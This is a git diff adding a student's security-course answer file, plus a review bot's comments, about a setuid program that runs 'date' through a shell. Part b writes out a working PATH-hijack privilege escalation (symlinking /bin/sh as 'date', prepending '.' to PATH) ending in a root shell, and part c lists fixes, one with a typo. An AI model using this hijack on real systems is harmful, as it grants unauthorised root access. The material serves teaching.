Diffstat (limited to 'CamilStaps-s4498062-Assignment-2/ex1')
-rw-r--r-- CamilStaps-s4498062-Assignment-2/ex1/ex1.txt 21
1 files changed, 21 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
new file mode 100644
index 0000000..28c5e20
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
@@ -0,0 +1,21 @@
+a
+ Using strace -feprocess ./showdate we see the following interesting calls:
+ execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
+ execve("/bin/date", ["date"], [/* 37 vars */])
+
+b
+ $ ln -s /bin/sh date
+ $ export PATH=.:$PATH
+ $ ./showdate
+ # id
+ uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)
+
+c
+ - Simply don't use execve for something as simple as this.
+ - The currently used system call is:
+ execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
+ This could be changed to:
+ execve("/bin/date", ...)
+ A nonprivileged user cannot change /bin/date.
+ - Drop privileges before executing execve.
+
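Review bot: The first bullet of part c ("Simply don't use execve") contradicts the fix proposed two lines later, which is itself an execve call. The problem shown in part a is not execve but the intermediate execve("/bin/sh", ["sh", "-c", "date"], ...): the shell resolves the bare name "date" through PATH, which part b controls with export PATH=.:$PATH. I would reword that bullet to say the program should not go through a shell or a PATH lookup. The quoted call in part c is also missing a closing quote (["sh, "-c", "date"]) and should match the strace output in part a. Finally, both traced calls pass the caller's environment ([/* 37 vars */]), so the execve("/bin/date", ...) suggestion should mention passing a minimal, fixed environment, and part b would benefit from one sentence explaining why the symlink named date is found first.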